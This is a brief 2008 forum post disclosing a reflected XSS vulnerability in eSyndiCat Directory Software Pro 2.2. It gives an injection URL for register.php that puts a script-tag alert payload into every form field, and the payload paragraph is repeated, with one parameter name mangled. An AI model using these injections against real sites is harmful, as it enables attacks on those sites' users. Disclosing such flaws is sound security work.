Fugitif
11.07.2008, 11:10
I have discovered xss vulnerability on eSyndiCat Directory Software Pro 2.2
My vulnerability is on "register.php" and works this way :
http://www.site.com/register.php where username="><script>alert(12157312.477)</script>&email="><script>alert(12157312.477)</script>&password="><script>alert(12157312.477)</script>&password2="><script>alert(12157312.477)</script>&security_code="><script>alert(12157312.477)</script>®ister="><script>alert(12157312.477)</script>
My vulnerability is on "register.php" and works this way :
http://www.site.com/register.php where username="><script>alert(12157312.477)</script>&email="><script>alert(12157312.477)</script>&password="><script>alert(12157312.477)</script>&password2="><script>alert(12157312.477)</script>&security_code="><script>alert(12157312.477)</script>®ister="><script>alert(12157312.477)</script>